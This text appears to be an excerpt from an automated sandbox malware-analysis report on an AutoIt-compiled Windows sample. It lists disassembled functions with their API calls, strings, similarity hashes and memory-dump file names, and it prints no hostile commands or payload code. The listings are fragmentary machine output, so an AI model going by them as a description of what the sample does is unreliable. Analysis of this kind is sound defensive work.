PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0101EC44
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0101EC6F

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: 263698a4723de4b8bc752b63ee0cebe24f413d4a194347fd384cee6125e879fb
Instruction ID: 2983e1f337893c6689d2113327e77db96a0a478c2ecbcbee44951ccb825df930
Opcode Fuzzy Hash: 263698a4723de4b8bc752b63ee0cebe24f413d4a194347fd384cee6125e879fb
Instruction Fuzzy Hash: 65512C71A00709AFDB219FA8CD89E6FBBF5FF08704F004918E6D6A25A4D779A945CB10

Function 010379B0 Relevance: 25.6, APIs: 17, Instructions: 109COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F8A), ref: 010379C6
LoadCursorW.USER32(00000000,00007F00), ref: 010379D1
LoadCursorW.USER32(00000000,00007F03), ref: 010379DC
LoadCursorW.USER32(00000000,00007F8B), ref: 010379E7
LoadCursorW.USER32(00000000,00007F01), ref: 010379F2
LoadCursorW.USER32(00000000,00007F81), ref: 010379FD
LoadCursorW.USER32(00000000,00007F88), ref: 01037A08
LoadCursorW.USER32(00000000,00007F80), ref: 01037A13
LoadCursorW.USER32(00000000,00007F86), ref: 01037A1E
LoadCursorW.USER32(00000000,00007F83), ref: 01037A29
LoadCursorW.USER32(00000000,00007F85), ref: 01037A34
LoadCursorW.USER32(00000000,00007F82), ref: 01037A3F
LoadCursorW.USER32(00000000,00007F84), ref: 01037A4A
LoadCursorW.USER32(00000000,00007F04), ref: 01037A55
LoadCursorW.USER32(00000000,00007F02), ref: 01037A60
LoadCursorW.USER32(00000000,00007F89), ref: 01037A6B
GetCursorInfo.USER32(?), ref: 01037A7B

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Cursor$Load$Info
String ID:
API String ID: 2577412497-0
Opcode ID: e9d231b0a2a0eec6d750cc506e022f85d6613ca8d29a17d016a13c80988ff215
Instruction ID: db27c8c67b97f513198402c3f6102d6a59f944a95700d4cd52b01b81c0862f63
Opcode Fuzzy Hash: e9d231b0a2a0eec6d750cc506e022f85d6613ca8d29a17d016a13c80988ff215
Instruction Fuzzy Hash: D53114B0D0831E6ADB509FF68C8995FBEECFF44750F40452AE54DE7280DA78A5018FA1

Function 00FEC833 Relevance: 25.0, APIs: 7, Strings: 7, Instructions: 479COMMON

Download Yara Rule

APIs

Part of subcall function 00FFE968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00FEC8B7,?,00002000,?,?,00000000,?,00FE419E,?,?,?,0107DC00), ref: 00FFE984

Part of subcall function 00FE660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FE53B1,?,?,00FE61FF,?,00000000,00000001,00000000), ref: 00FE662F

__wsplitpath.LIBCMT ref: 00FEC93E

Part of subcall function 01001DFC: __wsplitpath_helper.LIBCMT ref: 01001E3C

_wcscpy.LIBCMT ref: 00FEC953
_wcscat.LIBCMT ref: 00FEC968
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 00FEC978
SetCurrentDirectoryW.KERNEL32(?), ref: 00FECABE

Part of subcall function 00FEB337: _wcscpy.LIBCMT ref: 00FEB36F

Strings

Unterminated string, xrefs: 01053470
#include depth exceeded. Make sure there are no recursive includes, xrefs: 01053098
EA06, xrefs: 010530C9
Bad directive syntax error, xrefs: 01053429
Error opening the file, xrefs: 010530B4, 0105313D
>>>AUTOIT SCRIPT<<<, xrefs: 0105311B
AU3!, xrefs: 00FEC90C

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 2258743419-1018226102
Opcode ID: 2d556817d89a5b9c7224e3c68db115c0d0458cc5b17c5e792031b64fce1d0ce1
Instruction ID: 597d547151962558feabd5146671a07a3a5c0317946c3dfe48e65ef7681e0439
Opcode Fuzzy Hash: 2d556817d89a5b9c7224e3c68db115c0d0458cc5b17c5e792031b64fce1d0ce1
Instruction Fuzzy Hash: 0112CF315083819FC724EF25C891AAFBBE4BF98344F00482EF9C997261DB34D949DB92

Function 0104CE58 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0104CEFB
DestroyWindow.USER32(?,?), ref: 0104CF73
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0104CFF4
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0104D016
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0104D025
DestroyWindow.USER32(?), ref: 0104D042
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00FE0000,00000000), ref: 0104D075
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0104D094
GetDesktopWindow.USER32 ref: 0104D0A9
GetWindowRect.USER32(00000000), ref: 0104D0B0
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0104D0C2
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0104D0DA

Part of subcall function 00FFB526: GetWindowLongW.USER32(?,000000EB), ref: 00FFB537

Strings

0, xrefs: 0104CF1B
tooltips_class32, xrefs: 0104CFED, 0104D06E

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
String ID: 0$tooltips_class32
API String ID: 3877571568-3619404913
Opcode ID: b9493cecde121592fe4dfdd4ca3cbfb9f173dd1f15413a107fef4650d47f86c7
Instruction ID: 80a70906e265c1fcf5d5f1802d623f0c38504c02755b8e1ad1831ee1258800be
Opcode Fuzzy Hash: b9493cecde121592fe4dfdd4ca3cbfb9f173dd1f15413a107fef4650d47f86c7
Instruction Fuzzy Hash: AB71B0B0240305AFE721CF68CC85F6A7BE5EB98744F48492DFAC587291D779E942CB12

Function 0104F351 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00FFB34E: GetWindowLongW.USER32(?,000000EB), ref: 00FFB35F

DragQueryPoint.SHELL32(?,?), ref: 0104F37A

Part of subcall function 0104D7DE: ClientToScreen.USER32(?,?), ref: 0104D807
Part of subcall function 0104D7DE: GetWindowRect.USER32(?,?), ref: 0104D87D
Part of subcall function 0104D7DE: PtInRect.USER32(?,?,0104ED5A), ref: 0104D88D

SendMessageW.USER32(?,000000B0,?,?), ref: 0104F3E3
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0104F3EE
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0104F411
_wcscat.LIBCMT ref: 0104F441
SendMessageW.USER32(?,000000C2,00000001,?), ref: 0104F458
SendMessageW.USER32(?,000000B0,?,?), ref: 0104F471
SendMessageW.USER32(?,000000B1,?,?), ref: 0104F488
SendMessageW.USER32(?,000000B1,?,?), ref: 0104F4AA
DragFinish.SHELL32(?), ref: 0104F4B1
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0104F59C

Strings

@GUI_DROPID, xrefs: 0104F4D1
@GUI_DRAGID, xrefs: 0104F510
@GUI_DRAGFILE, xrefs: 0104F54B

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 169749273-3440237614
Opcode ID: 657824b0d15fabf6042e11a664426ba51595fbd68c1e22f3fe55065223705f03
Instruction ID: 1114ee557900f1112e7c13a4985a416fcbec8e9ed19320421dce3a43b95ec5b4
Opcode Fuzzy Hash: 657824b0d15fabf6042e11a664426ba51595fbd68c1e22f3fe55065223705f03
Instruction Fuzzy Hash: 05616AB1108345AFC311EF65CC85EAFBBE8BF88710F000A1EF6D5961A1DB759A09CB52

Function 0102AAF8 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 374timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 0102AB3D
VariantCopy.OLEAUT32(?,?), ref: 0102AB46
VariantClear.OLEAUT32(?), ref: 0102AB52
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0102AC40
__swprintf.LIBCMT ref: 0102AC70
VarR8FromDec.OLEAUT32(?,?), ref: 0102AC9C
VariantInit.OLEAUT32(?), ref: 0102AD4D
SysFreeString.OLEAUT32(00000016), ref: 0102ADDF
VariantClear.OLEAUT32(?), ref: 0102AE35
VariantClear.OLEAUT32(?), ref: 0102AE44
VariantInit.OLEAUT32(00000000), ref: 0102AE80

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 0102AC6A
Default, xrefs: 0102ACFD

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 3730832054-3931177956
Opcode ID: 8404842e4eb8c490cd279a2641f5e5f97b4557873a36f85879f105af4383b6b3
Instruction ID: 1875bf2809a8de51129f23b4a0cb8f633a844aeaa905adf27e59b0ce84241d6a
Opcode Fuzzy Hash: 8404842e4eb8c490cd279a2641f5e5f97b4557873a36f85879f105af4383b6b3
Instruction Fuzzy Hash: 08D10431700229DBDB219F69C884BBDBBF9FF04B00F048895E5959B981DF78E840DBA1

Function 0104716A Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 244windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 010471FC
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 01047247

Strings

ISCHECKED, xrefs: 010473B2
UNCHECK, xrefs: 0104740B
EXPAND, xrefs: 010472E1
COLLAPSE, xrefs: 0104728D
CHECK, xrefs: 01047267
GETITEMCOUNT, xrefs: 01047311
GETTEXT, xrefs: 01047382
EXISTS, xrefs: 010472B0
SELECT, xrefs: 010473E0
GETTOTALCOUNT, xrefs: 0104722A
GETSELECTED, xrefs: 0104733F

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: 1d1ce52bacf003560db53e7aa0d1eb230332d997ae385111d25c641d1100bcf8
Instruction ID: 3f3fc04edebf0a906e062a3efbfc839811749b2f9fae953312f0e32971df722c
Opcode Fuzzy Hash: 1d1ce52bacf003560db53e7aa0d1eb230332d997ae385111d25c641d1100bcf8
Instruction Fuzzy Hash: F99180702047419FDB04EF14C991A6EBBA5BF94310F004868F9D65B3A3DB78ED0ADB91

Function 0104E4F5 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 199windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0104E5AB
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,0104BEAF), ref: 0104E607
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0104E647
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0104E68C
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0104E6C3
FreeLibrary.KERNEL32(?,00000004,?,?,?,?,0104BEAF), ref: 0104E6CF
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0104E6DF
DestroyIcon.USER32(?,?,?,?,?,0104BEAF), ref: 0104E6EE
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0104E70B
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0104E717

Part of subcall function 01000FA7: __wcsicmp_l.LIBCMT ref: 01001030

Strings

.icl, xrefs: 0104E521
.dll, xrefs: 0104E564
.exe, xrefs: 0104E541

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 1212759294-1154884017
Opcode ID: 63bf6ae11ea9fb41bf11b553fb54e31c56f97c141391266d3372ccbc16b05409
Instruction ID: a79234dcad4bf420f34c021053e1d1c8edc8d4d613e59743383143476ac6a21e
Opcode Fuzzy Hash: 63bf6ae11ea9fb41bf11b553fb54e31c56f97c141391266d3372ccbc16b05409
Instruction Fuzzy Hash: E961D3B1600215BFEB21DF68CC85FFE7BA8BB08750F104165F995D60D1EB799980C7A0

Function 0102D219 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00FE936C: __swprintf.LIBCMT ref: 00FE93AB
Part of subcall function 00FE936C: __itow.LIBCMT ref: 00FE93DF

CharLowerBuffW.USER32(?,?), ref: 0102D292
GetDriveTypeW.KERNEL32 ref: 0102D2DF
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0102D327
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0102D35E
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0102D38C

Strings

close cd wait, xrefs: 0102D377
type cdaudio alias cd wait, xrefs: 0102D30A
closed, xrefs: 0102D2A6, 0102D2AF
open, xrefs: 0102D2B9
open , xrefs: 0102D2EE
wait, xrefs: 0102D349
set cd door , xrefs: 0102D32D
close, xrefs: 0102D298

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 1148790751-4113822522
Opcode ID: b2fb012db87f4591e51c7e569235f6501acd7bd0d092797fd2d869c4cd37162e
Instruction ID: 012fc941fc38b2d95561f7973610f4267afd31aa2d179e4678a0cc10aac2b270
Opcode Fuzzy Hash: b2fb012db87f4591e51c7e569235f6501acd7bd0d092797fd2d869c4cd37162e
Instruction Fuzzy Hash: C3516A715042449FC700EF25C89196EB7E8FF98758F00886DF8D5AB261DB79EE0ADB81

Function 010226BC Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,01053973,00000016,0000138C,00000016,?,00000016,0107DDB4,00000000,?), ref: 010226F1
LoadStringW.USER32(00000000,?,01053973,00000016), ref: 010226FA
GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,01053973,00000016,0000138C,00000016,?,00000016,0107DDB4,00000000,?,00000016), ref: 0102271C
LoadStringW.USER32(00000000,?,01053973,00000016), ref: 0102271F
__swprintf.LIBCMT ref: 0102276F
__swprintf.LIBCMT ref: 01022780
_wprintf.LIBCMT ref: 01022829
MessageBoxW.USER32(00000000,?,?,00011010), ref: 01022840

Strings

Error: , xrefs: 010227F7
%s (%d) : ==> %s: %s %s, xrefs: 01022824
Line %d:, xrefs: 0102277A
^ ERROR, xrefs: 010227D5
Line %d (File "%s"):, xrefs: 01022769

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 618562835-2268648507
Opcode ID: fb78dc562dbdc29b7c2977353be2c8e771ef94a3df53b758e15f8bac00b66db8
Instruction ID: 7f0d36193ffb98c07ef8acd946ef717301252c07ad15461543c66f59d5e3da73
Opcode Fuzzy Hash: fb78dc562dbdc29b7c2977353be2c8e771ef94a3df53b758e15f8bac00b66db8
Instruction Fuzzy Hash: 21418172800259BACF10FBE1CD86DEEB778AF14744F100065F64176092EB78AF09EBA0

Function 0102D0B8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0102D0D8
__swprintf.LIBCMT ref: 0102D0FA
CreateDirectoryW.KERNEL32(?,00000000), ref: 0102D137
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0102D15C
_memset.LIBCMT ref: 0102D17B
_wcsncpy.LIBCMT ref: 0102D1B7
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0102D1EC
CloseHandle.KERNEL32(00000000), ref: 0102D1F7
RemoveDirectoryW.KERNEL32(?), ref: 0102D200
CloseHandle.KERNEL32(00000000), ref: 0102D20A

Strings

:, xrefs: 0102D11B
\, xrefs: 0102D110
\??\%s, xrefs: 0102D0F4

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: ba9355ed0dc5460b365433e96adfa901e3f23105bdcdaf23ca953f9626000aea
Instruction ID: ecfa2a428d07ec9339165cf5dfd9c34dbee5a789c75eae6950fc8b20add0c035
Opcode Fuzzy Hash: ba9355ed0dc5460b365433e96adfa901e3f23105bdcdaf23ca953f9626000aea
Instruction Fuzzy Hash: A531A57160011AABEB21DFA4CC48FEB77BCEF99741F1040B6F589D21A4E774D6448B24

Function 0104E731 Relevance: 22.6, APIs: 15, Instructions: 129filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,0104BEF4,?,?), ref: 0104E754
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0104BEF4,?,?,00000000,?), ref: 0104E76B
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0104BEF4,?,?,00000000,?), ref: 0104E776
CloseHandle.KERNEL32(00000000,?,?,?,?,0104BEF4,?,?,00000000,?), ref: 0104E783
GlobalLock.KERNEL32(00000000), ref: 0104E78C
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0104BEF4,?,?,00000000,?), ref: 0104E79B
GlobalUnlock.KERNEL32(00000000), ref: 0104E7A4
CloseHandle.KERNEL32(00000000,?,?,?,?,0104BEF4,?,?,00000000,?), ref: 0104E7AB
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0104BEF4,?,?,00000000,?), ref: 0104E7BC
OleLoadPicture.OLEAUT32(?,00000000,00000000,0106D9BC,?), ref: 0104E7D5
GlobalFree.KERNEL32(00000000), ref: 0104E7E5
GetObjectW.GDI32(00000000,00000018,?), ref: 0104E809
CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0104E834
DeleteObject.GDI32(00000000), ref: 0104E85C
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0104E872

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 4e9287bd71ec145f4c185d618b4dcc1a7910b1212d8f9f2d44e875591f2eb5f1
Instruction ID: 42841d6a400b26ac4972b215f36cdf4fea6ddc0d3441cddbb6a9ecab1ef43dce
Opcode Fuzzy Hash: 4e9287bd71ec145f4c185d618b4dcc1a7910b1212d8f9f2d44e875591f2eb5f1
Instruction Fuzzy Hash: E1415C75600205FFDB219FA5DC88EAE7BB9FF89721F108068F989D7260D7399940CB20

Function 010305F8 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 0103076F
_wcscat.LIBCMT ref: 01030787
_wcscat.LIBCMT ref: 01030799
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 010307AE
SetCurrentDirectoryW.KERNEL32(?), ref: 010307C2
GetFileAttributesW.KERNEL32(?), ref: 010307DA
SetFileAttributesW.KERNEL32(?,00000000), ref: 010307F4
SetCurrentDirectoryW.KERNEL32(?), ref: 01030806

Strings

*.*, xrefs: 01030845

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: fddc8baf7ea53b5c933c654ab978843d7abccd40e6a2c4cbe835800759efabf1
